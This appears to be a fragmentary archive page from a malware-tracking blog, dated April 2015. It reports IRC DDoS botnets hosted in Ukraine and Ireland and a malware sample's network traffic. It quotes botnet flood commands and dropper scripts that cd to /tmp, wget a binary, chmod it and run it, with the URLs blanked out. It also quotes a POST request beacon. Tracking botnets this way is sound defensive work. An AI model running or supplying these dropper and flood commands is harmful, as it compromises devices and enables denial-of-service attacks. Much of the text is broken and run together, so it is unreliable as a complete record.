Month: April 2015 Botnet hosted in Ukraine Kiev Blazingfast Llc)

Another SDT botnet found by abigail. Server : Port : 443 Channel : #secgod DDOS Coming Up : <~Broken> >bot +std 80 30 [STD]Hitting! [STD]Done hitting! <~Broken> >bot +stop Killing pid 13923. Other url : #!/bin/sh cd /tmp && wget && chmod +x mosh && ./mosh cd /tmp && wget Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)

Found by abigail Server : Port 443 Channel : #sh DDOS Coming Up lol : <~Haze> >bot +std 80 120 [STD]Hitting! [STD]Hitting! [STD]Done hitting! [STD]Done hitting! The Bot u can download it here. Other : #!/bin/sh # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. # UPLOAD GETBINARIES.SH IN YOUR malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware: HTTP Requests: URI: DATA: POST /dffgbDFGvf465/YYf.php HTTP/1.0 Host: Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 272 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) samples: